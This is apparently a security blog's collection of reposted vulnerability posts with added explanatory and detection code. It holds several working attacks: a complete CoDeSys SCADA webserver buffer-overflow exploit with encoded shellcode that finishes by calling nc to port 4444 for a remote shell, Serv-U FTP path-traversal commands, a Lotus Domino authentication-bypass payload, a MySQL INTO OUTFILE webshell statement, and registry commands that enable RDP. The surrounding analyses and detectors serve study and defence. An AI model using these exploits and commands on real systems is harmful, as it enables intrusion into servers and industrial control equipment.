http://wiki.secmobi.com/tools:android_dynamic_analysis


http://forum.xda-developers.com/xposed/framework-xposed-rom-modding-modifying-t1574401


http://www.sectechno.com/2014/02/02/fino-android-security-assessment-tool/

Posted by bitfox

While I was distracted for a moment, an interesting vulnerability turned up.

Microsoft IIS Tilde Character Short File/Folder Name Disclosure

 

IIS servers have a vulnerability that lets an attacker infer folder and file names using the tilde character (~): the 8.3 short names Windows generates for long names (for example SECRET~1.TXT) can be probed one character at a time, because the server answers differently depending on whether a name matching the wildcard exists.

 

See the document below for the details.

http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

 

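As an added example, not from the post or from the linked paper, the enumeration logic the paper describes, run against a constructed stand-in for the IIS oracle. The mock answers 404 when a wildcard pattern such as `SE*~1*` matches one of its short names and 400 when it does not (an assumption modelled on the IIS 6 behaviour the paper discusses; status codes and the HTTP verb that works differ between IIS versions). The sample short names are constructed, only the `~1` suffix is probed, and extensions are not enumerated.

```python
import fnmatch
import string

# Constructed sample (not from the post): 8.3 short names as NTFS would generate
# them for a few files in a web root. INDEX.HTM needs no short form.
SAMPLE_SHORT_NAMES = ["WEBCON~1.CON", "SECRET~1.TXT", "ADMIN~1", "INDEX.HTM"]


def mock_iis_status(pattern):
    """Stand-in for the server. The real probe is a request such as
    GET /SE*~1*/.aspx, answered 404 when some short name matches the wildcard
    and 400 when none does (assumed here, see lead-in)."""
    pat = pattern.upper()
    hit = any(fnmatch.fnmatchcase(name, pat) for name in SAMPLE_SHORT_NAMES)
    return 404 if hit else 400


# 8.3 stems are upper-case letters, digits and a few symbols; kept short here.
CHARSET = string.ascii_uppercase + string.digits + "_-"


def enumerate_short_names(status, charset=CHARSET, max_stem=6):
    """Recover 8.3 stems one character at a time using only the
    exists / does-not-exist signal. Returns (stems, number of probes)."""
    found = []
    queries = 0

    def probe(pattern):
        nonlocal queries
        queries += 1
        return status(pattern) == 404

    def extend(stem):
        # "SECRET~1*" matches SECRET~1.TXT: the stem is complete, record it.
        if stem and probe(stem + "~1*"):
            found.append(stem + "~1")
        if len(stem) >= max_stem:
            return
        for c in charset:
            # "SE*~1*" matches any short name starting with SE: keep extending.
            if probe(stem + c + "*~1*"):
                extend(stem + c)

    extend("")
    return found, queries


if __name__ == "__main__":
    names, n = enumerate_short_names(mock_iis_status)
    print(f"recovered {names} with {n} probes")
```

Against the sample data the three stems come back in a few hundred probes, which is why the paper treats this as practical: the alphabet is small and each position is confirmed independently, so the cost is linear in name length rather than exponential.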

Posted by bitfox

On Windows (XP, NT, 2003) the RDP service, a.k.a. "Remote Desktop Connection", can be enabled or disabled by changing a registry value.
The firewall, too, can be controlled through the registry without a reboot.

First, the commands:

Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

The /d value is the on/off switch. Note that fDenyTSConnections is a "deny" flag, so 0 allows Remote Desktop connections and 1 blocks them. Writing under HKEY_LOCAL_MACHINE requires administrator rights.


[Caution] This material is intended for research and study purposes only; the user bears full responsibility for any malicious use.


 

Posted by bitfox
This post was written to show that in an APM (Apache/PHP/MySQL) environment a system can be compromised through a default account or an unmanaged MySQL instance. Many security staff overlook this, so appropriate measures are needed.

[Screen 1] Setup information page exposed after a typical APM install

[Screen 2] Guessing, from a phpinfo file or the web root, the path where the webshell must be written

[Screen 3] Attacking with the APM default initial password


[Screen 4] Accessing the MySQL DB server admin page

[Screen 5] Creating the webshell file with an SQL command


[Screen 6] A cmd webshell named WS.php is created

[Screen 7] The server can be attacked through the cmd webshell

As shown above, once the DB is reachable, creating a webshell and attacking the host is entirely feasible. The exact SQL differs a little between database products, but the principle is common to all of them, and so are the countermeasures.

The first countermeasure for this example is to change the account password without fail after installing APM; in addition, adding an IP restriction in the httpd-alias.conf file is also an effective technical control.
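As an added example, not code from this post, the check a defender would run on the MySQL side of an APM install: whether the account an attacker can log in with could write WS.php the way Screen 5 does. The post does not print the statement; the standard MySQL way to write a file from SQL is `SELECT ... INTO OUTFILE`, which needs the global FILE privilege and is constrained by the `secure_file_priv` server variable. The function below parses constructed `SHOW GRANTS` output and that variable and says whether the path is open. The web root and account names are assumptions.

```python
import re

# Constructed sample of what an attacker (or an auditor) sees after logging in
# with the default account; not output from the post.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
]
SAMPLE_GRANTS_LIMITED = [
    "GRANT SELECT, INSERT, UPDATE ON `app`.* TO 'app'@'localhost'",
]
WEB_ROOT = "C:/APM_Setup/htdocs"  # assumed web root of the APM install

# The statement behind [Screen 5] in the usual MySQL form; the post does not
# show it, so this is the standard technique, not a transcript.
WEBSHELL_SQL = (
    "SELECT '<?php system($_REQUEST[\"cmd\"]); ?>' "
    f"INTO OUTFILE '{WEB_ROOT}/WS.php'"
)
# Hardening counterparts: FILE is a global privilege, so it is revoked on *.*;
# secure_file_priv = NULL in my.ini disables INTO OUTFILE / LOAD_FILE entirely.
HARDENING_SQL = ["REVOKE FILE ON *.* FROM 'app'@'localhost'"]


def has_file_privilege(grants):
    """FILE is only grantable globally, so only the ON *.* grants matter."""
    for g in grants:
        m = re.match(r"GRANT (.+?) ON \*\.\* TO", g, re.IGNORECASE)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if "ALL PRIVILEGES" in privs or "FILE" in privs:
            return True
    return False


def _norm(path):
    return path.replace("\\", "/").rstrip("/").lower()


def outfile_allowed(secure_file_priv, target_path):
    """NULL disables file writes, '' allows any path (old default),
    a directory restricts writes to that tree."""
    if secure_file_priv is None or secure_file_priv.upper() == "NULL":
        return False
    if secure_file_priv == "":
        return True
    return _norm(target_path).startswith(_norm(secure_file_priv) + "/")


def webshell_possible(grants, secure_file_priv, target_path):
    """Decide whether the INTO OUTFILE route to a webshell is open."""
    if not has_file_privilege(grants):
        return False, "account lacks FILE privilege"
    if not outfile_allowed(secure_file_priv, target_path):
        return False, f"secure_file_priv={secure_file_priv!r} blocks writing {target_path}"
    return True, "FILE privilege and unrestricted OUTFILE: the shell can be written"


if __name__ == "__main__":
    for spv in ("", "NULL", "C:/APM_Setup/mysql_files"):
        print(spv or "''", "->", webshell_possible(SAMPLE_GRANTS, spv, WEB_ROOT + "/WS.php"))
```

Changing the password closes the door the post walks through; the two server-side settings close the room behind it, so a future credential leak or SQL injection no longer turns into code execution on the host.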




Posted by bitfox


The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours.


[Source] thehackernews.com
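An added example, not from the quoted article, of why the brute force finishes in hours rather than years. The registrar protocol reports whether the first four PIN digits are right (NACK after M4) before the second half is ever checked, and the eighth digit is a checksum of the first seven, so the search is at most 10^4 + 10^3 attempts instead of 10^7. The `MockRegistrar` class is a constructed stand-in for an access point with that flaw, not a real WPS implementation; the checksum routine is the standard WPS one, and the PIN used in the demo is constructed.

```python
def wps_checksum(first7):
    """Checksum digit appended to the first seven PIN digits
    (weights 3,1,3,1,... from the right, as in the WPS specification)."""
    acc = 0
    while first7:
        acc += 3 * (first7 % 10)
        first7 //= 10
        acc += first7 % 10
        first7 //= 10
    return (10 - acc % 10) % 10


def full_pin(first7):
    return f"{first7:07d}{wps_checksum(first7)}"


class MockRegistrar:
    """Constructed stand-in for the access point. It reproduces the design
    flaw: the M4/M5 exchange reveals whether the first four digits are right
    on its own, and the M6/M7 exchange then reveals the second half."""

    def __init__(self, pin):
        self._pin = pin
        self.attempts = 0

    def try_pin(self, pin):
        self.attempts += 1
        if pin[:4] != self._pin[:4]:
            return "NACK after M4"  # first half wrong
        if pin[4:] != self._pin[4:]:
            return "NACK after M6"  # second half wrong
        return "M7"                 # both halves right: AP hands over the WPA passphrase


def brute_force(ap):
    """Recover the PIN in at most 10^4 + 10^3 attempts. Returns (pin, attempts)."""
    for a in range(10_000):
        first = f"{a:04d}"
        if ap.try_pin(first + "0000") != "NACK after M4":
            break                   # first half confirmed, second half not yet known
    else:
        raise RuntimeError("first half not found")
    for b in range(1_000):          # three free digits; the eighth is the checksum
        pin = full_pin(a * 1000 + b)
        if ap.try_pin(pin) == "M7":
            return pin, ap.attempts
    raise RuntimeError("second half not found")


def worst_case_attempts():
    """Split halves plus checksum: 11,000 tries, versus 10**7 for a blind search."""
    return 10_000 + 1_000


if __name__ == "__main__":
    pin, n = brute_force(MockRegistrar("12345670"))
    print(f"recovered {pin} after {n} attempts (worst case {worst_case_attempts()})")
```

The mitigation follows from the same arithmetic: an AP that locks WPS after a handful of failed PINs, or that does not expose external-registrar PIN mode at all, removes the per-half oracle the loop depends on.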



Posted by bitfox

/*
CoDeSys v2.3 Industrial Control System Development Software
Remote Buffer Overflow Exploit for CoDeSys Scada webserver
Author : Celil UNUVER, SignalSEC Labs
www.signalsec.com
Tested on WinXP SP1 EN
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!
--snip--
  
root@bt:~# ./codesys 192.168.1.36
  
CoDeSys v2.3 webserver Remote Exploit
 by SignalSEC Labs - www.signalsec.com
  
[+]Sending payload to SCADA system!
  
[+]Connecting to port 4444 to get shell!
192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.36] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
  
C:\Program Files\3S Software\CoDeSys V2.3\visu>  
  
--snip--
  
*/
  
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
  
#define name "CoDeSys v2.3 webserver Remote Exploit"
#define PORT 8080
#define JUNK "A"
  
int main ( int argc, char *argv[] )
{
  
   
int sock, i, payload;
  
struct sockaddr_in dest_addr;
  
char *target = "target";
  
char request[1600], *ptr;
  
  
char ret[] = "\x67\x42\xa7\x71"; //ret - WINXP SP1 EN , mswsock.dll
  
char hellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
"\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x58"
"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x32\x45\x47\x45\x4e\x4b\x58"
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x38"
"\x49\x58\x4e\x36\x46\x42\x4e\x41\x41\x36\x43\x4c\x41\x43\x4b\x4d"
"\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48"
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x56"
"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46"
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x36\x47\x37\x43\x57"
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x45\x43\x55\x43\x45\x43\x34"
"\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x41\x31"
"\x4e\x35\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"
"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41"
"\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x54\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36"
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x32\x4e\x4c"
"\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x48\x44\x4e\x41\x33\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x52"
"\x43\x39\x4d\x58\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x35\x41\x35\x41\x45\x4c\x56"
"\x41\x30\x41\x35\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f"
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";
  
printf ("\n%s\n by SignalSEC Labs - www.signalsec.com\n", name);
  
if (argc < 2) 
{
        printf ("\nUsage: codesys [IP]\n");
        exit (-1);
}
  
setenv (target, argv[1], 1);
  
  
memset (request, '\0', sizeof (request));
ptr = request;
strcat (request, "GET /");
  
for(i = 1; i < 776; i++){
  
    strcat (request, JUNK);
}
  
strcat (request, ret);
strcat (request, hellcode);
strcat (request, " HTTP/1.1");
strcat (request, "\r\n");
  
  
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("\nsocket error\n");
        exit (1);
        }
  
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(PORT);
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
        perror("inet_aton problems");
        exit (2);
        }
  
memset( &(dest_addr.sin_zero), '\0', 8);
  
if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
        perror("\nCouldnt connect to target!\n");
        close (sock);
        exit (3);
        }
  
payload = (send (sock, ptr, strlen(request), 0));
if (payload == -1) {
        perror("\nCan not send the payload\n");
        close (sock);
        exit(4);
        }
close (sock);
printf ("\n[+]Sending payload to SCADA system!\n");
sleep (1);
printf ("\n[+]Connecting to port 4444 to get shell!\n");
sleep (2);
system("nc -vv ${target} 4444 || echo 'Sorry exploit failed! Change RET address or be sure target is not patched!'");
exit (0);
}

[Source] exploit-db.com
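As an added example, not part of the exploit above, a detection check a defender could run over request lines captured on the CoDeSys webserver port (8080 in the exploit): the malicious request is a GET whose URI is 775 filler bytes, a return address and shellcode, so it stands out by URI length, by non-printable bytes and by a long run of identical bytes. The sample request lines are constructed here in the same shape; the shellcode bytes are NOP stand-ins, not the exploit's encoder, and the benign path is an assumption.

```python
import string

PRINTABLE = frozenset(string.printable.encode()) - frozenset(b"\x0b\x0c")


def build_request_line(junk_len=775, ret=b"\x67\x42\xa7\x71", shellcode=b"\x90" * 709):
    """Constructed sample with the same shape as the exploit's request line
    (GET / + filler + return address + shellcode + version)."""
    return b"GET /" + b"A" * junk_len + ret + shellcode + b" HTTP/1.1\r\n"


def longest_run(data):
    """Length of the longest run of one repeated byte value."""
    best = run = 0
    for i, b in enumerate(data):
        run = run + 1 if i and data[i - 1] == b else 1
        best = max(best, run)
    return best


def inspect_request_line(line, max_uri=512, max_run=64):
    """Return the reasons a request line looks like a stack-overflow attempt
    (an empty list means nothing suspicious)."""
    findings = []
    head, sep, _version = line.rstrip(b"\r\n").rpartition(b" HTTP/")
    if not sep:
        findings.append("no HTTP version token")
        head = line.rstrip(b"\r\n")
    _method, _, uri = head.partition(b" ")
    if len(uri) > max_uri:
        findings.append(f"URI length {len(uri)} exceeds {max_uri}")
    if any(b not in PRINTABLE for b in uri):
        findings.append("non-printable bytes in URI (return address / shellcode)")
    run = longest_run(uri)
    if run >= max_run:
        findings.append(f"run of {run} identical bytes (filler or NOP sled)")
    return findings


# Constructed sample of what a capture on port 8080 might contain.
SAMPLE_LINES = [
    b"GET /webvisu.htm HTTP/1.1\r\n",  # assumed benign request to the web visualisation
    build_request_line(),
]


def scan(lines):
    """Indexes and findings of the lines that were flagged."""
    flagged = []
    for i, line in enumerate(lines):
        f = inspect_request_line(line)
        if f:
            flagged.append((i, f))
    return flagged


if __name__ == "__main__":
    for i, f in scan(SAMPLE_LINES):
        print(i, f)
```

The thresholds are deliberately coarse: a URI over 512 bytes to a fixed-function embedded web server is unusual on its own, and the three signals together are hard to avoid for an exploit that must overwrite a return address and carry its payload in the same request.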



Posted by bitfox


I'm better than TESO!
CONFIDENTIAL SOURCE MATERIALS!

[*]----------------------------------------------------[*]
 Serv-U FTP Server Jail Break 0day
 Discovered By Kingcope
 Year 2011
[*]----------------------------------------------------[*]

Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...

[*]----------------------------------------------------[*]
C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp        (anonymous user :>)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/program files"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r--   1 user     group           0 Nov 12 21:48 .
dr--r--r--   1 user     group           0 Nov 12 21:48 ..
drw-rw-rw-   1 user     group           0 Feb 14  2011 Apache Software Foundation
drw-rw-rw-   1 user     group           0 Feb  5  2011 ComPlus Applications
drw-rw-rw-   1 user     group           0 Jul 11 01:06 Common Files
drw-rw-rw-   1 user     group           0 Jul  8 16:57 CoreFTPServer
drw-rw-rw-   1 user     group           0 Jul 11 01:06 IIS Resources
d---------   1 user     group           0 Jul  8 16:12 InstallShield Installation Information
drw-rw-rw-   1 user     group           0 Jul 29 15:07 Internet Explorer
drw-rw-rw-   1 user     group           0 Jul  8 16:12 Ipswitch
drw-rw-rw-   1 user     group           0 Feb 12  2011 Java
drw-rw-rw-   1 user     group           0 Jul 26 13:19 NetMeeting
drw-rw-rw-   1 user     group           0 Jul 29 14:39 Outlook Express
drw-rw-rw-   1 user     group           0 Jul  8 15:39 PostgreSQL
drw-rw-rw-   1 user     group           0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw-   1 user     group           0 Feb 12  2011 Sun
d---------   1 user     group           0 Jul 29 15:13 Uninstall Information
drw-rw-rw-   1 user     group           0 Feb  5  2011 VMware
drw-rw-rw-   1 user     group           0 Jul  8 15:34 WinRAR
drw-rw-rw-   1 user     group           0 Jul 26 13:30 Windows Media Player
drw-rw-rw-   1 user     group           0 Feb  5  2011 Windows NT
d---------   1 user     group           0 Feb  5  2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>
[*]----------------------------------------------------[*]
with write perms:
ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition
[*]----------------------------------------------------[*]
and as anonymous ftp:
ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
[*]----------------------------------------------------[*]

This works too!!!:

220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
AUTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
Inetpub
IO.SYS
log
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s

[*]----------------------------------------------------[*]
Sometimes you need to give it the path:

ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE Remote Tools
cmak
Common Files
ComPlus Applications
D-Tools
FFTPServer
HTML Help Workshop
IISServer
InstallShield Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Microsoft Device Emulator
Microsoft MapPoint Web Service Samples
Microsoft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafe
Microsoft Visual Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
Symantec
Thunder Network
TSingVision
Uninstall Information
Windows Media Player
Windows NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>

[Source] exploit-db.com
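An added example, not Kingcope's code, of the difference between the two path checks the transcript illustrates. Serv-U's virtual-path layer treats `..:` as an ordinary name rather than as a parent reference (the 250 reply maps each one to the home directory name), so a filter that only rejects a literal `..` lets it through; the operating system then resolves the same string with the `:stream` suffix stripped, the usual explanation being that the colon starts an NTFS alternate-data-stream name, so `..:` reaches the filesystem as `..`. The `windows_like_resolve` function is a simplified emulation of that stripping (an assumption, written so the example runs on any OS), and the jail root path is assumed since the transcript does not show it.

```python
def split_components(virtual_path):
    """Split an FTP argument on either separator, dropping empty and '.' parts."""
    return [c for c in virtual_path.replace("\\", "/").split("/") if c not in ("", ".")]


def naive_jail_check(virtual_path):
    """Filter-style check: only a component that is literally '..' moves up.
    This is the behaviour the transcript shows: '..:' is accepted as a name."""
    depth = 0
    for comp in split_components(virtual_path):
        if comp == "..":
            depth -= 1
            if depth < 0:
                return False
        else:
            depth += 1
    return True


def windows_like_resolve(root, virtual_path):
    """Emulation (assumption, see lead-in) of how the OS sees the same string:
    text from the first ':' on is a stream name, not part of the directory
    name, so '..:' is resolved as '..'."""
    stack = root.rstrip("/").split("/")
    for comp in split_components(virtual_path):
        name = comp.split(":", 1)[0]
        if name == "..":
            if len(stack) > 1:  # never above the drive root
                stack.pop()
        elif name:
            stack.append(name)
    return "/".join(stack)


def canonical_jail_check(root, virtual_path):
    """Resolve first, then compare: the check a jail actually needs."""
    resolved = windows_like_resolve(root, virtual_path).lower()
    base = root.rstrip("/").lower()
    return resolved == base or resolved.startswith(base + "/")


# Assumed jail root for the anonymous account (not shown in the transcript).
JAIL_ROOT = "C:/ftproot/home/anonymous"
# The cd argument from the transcript, with three levels for this root.
ESCAPE = "..:/..:/..:/program files"


if __name__ == "__main__":
    print("naive check   :", naive_jail_check(ESCAPE))
    print("canonical     :", canonical_jail_check(JAIL_ROOT, ESCAPE))
    print("OS resolves to:", windows_like_resolve(JAIL_ROOT, ESCAPE))
```

The general lesson is independent of Serv-U: a jail implemented as a string filter on the path the client sent is only as good as the filter's model of the OS name syntax, while a jail that canonicalises with the same rules the OS uses and compares the result against the root has nothing to be bypassed.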



Posted by bitfox
/* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit
 *
 * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS
 *

 

 * This is unpublished proprietary source code of KINGCOPE Security.
 *
 * (C) COPYRIGHT KINGCOPE Security, 2011
 * All Rights Reserved
 *
 *****************************************************************************
 * bug found by Kingcope
 * thanks to noone except alex whose damn down
 *
 * tested against:  FreeBSD-8.2,8.1,7.2,7.1 i386;
 *                  FreeBSD-6.3 i386
 *                  FreeBSD-5.5,5.2 i386
 *                  FreeBSD-8.2 amd64
 *                  FreeBSD-7.3, 7.0 amd64
 *                  FreeBSD-6.4, 6.2 amd64
 *
 */
  
I'm better than TESO 7350, see attached.
I ain't mad at cha
and don't forget that the scene is fucked.
and that the public scene is fucked too, kind of.
youse a down ass bitch and I ain't mad at cha.
thanks lsd, you are the only one NORMAL.
hear the track before you see the code:
http://www.youtube.com/watch?v=krxu9_dRUwQ
BTW my box (isowarez.de) got hacked so expect me in a zine :>
  
/Signed "the awesome" Kingcope
  
Code:
http://www.exploit-db.com/sploits/7350roaringbeastv3.tar



[Source] www.exploit-db.com




Posted by bitfox
# Exploit Title: IBM Lotus Domino Controller auth. bypass
# Date:30/11/2011
# Author: Alexey Sintsov
# Software Link: http://www.ibm.com/
# Version:8.5.3/8.5.2 FP3 (0day) 
# Tested on: Windows 7 / Windows 2008
# CVE : CVE-2011-1519
  
  
Application: IBM Lotus Domino Controller
Versions Affected: <=8.5.2 FP3, <=8.5.3
Manager 4.0 prior to Update 4
(0day) 
Vendor URL: http://ibm.com
Bug: own XML parser  
CVE: CVE-2011-1519
CVSS2: 9.0
Exploits: YES
Reported:2010-09-23 via ZDI
Date of Public Advisory: 2011-03-22
Authors: Alexey Sintsov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
  
This bug was found by Patrik Karlsson and sold to ZDI. IBM made a fix for this bug,
but it is not enough. So this sploit can bypass authentication in Lotus Domino Controller even with the patch from IBM. So it is still a 0day.
You can read the details here: http://dsecrg.com/pages/pub/show.php?id=41
  
EXPLOIT:
  
1. Make port-fwd from 127.0.0.1:2050 to REMOTE_TARGET:2050
2. Inject XML into the IIS log file (for example)
  
ncat targethost 49152
GET /<user HTTP/1.0\r\n\r\n
  
  
ncat targethost 49152
GET /user="admin"cookie="pass"address="http://twitter/asintsov" HTTP/1.0\r\n\r\n
  
(\r\n\r\n: press ENTER two times 8)
  
3.Run this from local web-server (dconsole.jar - IBM Lotus Domino Console applet)
  
<html>
<body>
<script>
function onLoadConsole()
{
alert("Connected");
}
</script>
<applet name = "DominoConsole"
code = "lotus.domino.console.DominoConsoleApplet.class"
codebase = "http://127.0.0.1/domjava/"
archive = "dconsole.jar"
width = "100%"
height = "99%"
>
<PARAM NAME="debug" VALUE="true">
<PARAM NAME="port" VALUE="2050">
<PARAM NAME="useraddress" VALUE="http://twitter/asintsov">
<PARAM NAME="username" VALUE="admin">
<PARAM NAME="cookiefile" VALUE="\..\..\..\windows\system32\logfiles\httperr\httperr1.log">
<PARAM NAME="cookievalue" VALUE="pass">
<PARAM NAME="onLoad" VALUE="onLoadConsole">
</applet>
</body>
</html>


[Source] exploit-db




Posted by bitfox

Padding oracle attack explained

In cryptography, the padding oracle attack is an attack on the CBC mode of operation in which the server leaks whether the padding of a submitted ciphertext is correct or not. An oracle is a mechanism that tells the attacker whether a test passed or failed; here that single bit per query is enough to decrypt, and even to forge, data without the key.

How to find out whether your .NET application is vulnerable to a padding oracle attack:

    1. Using Burp proxy, capture a request to the WebResource.axd file.
      Ex: http://somesite.com/webresource.axd?d=qmZbysenet6VGS94Ord8gQ2
    2. Change one character in the d value and send the request to the server. Observe the response.
    3. Send a request to a non-existent aspx page on the server. Observe the response.
      Ex: http://somesite.com/nonexist.aspx
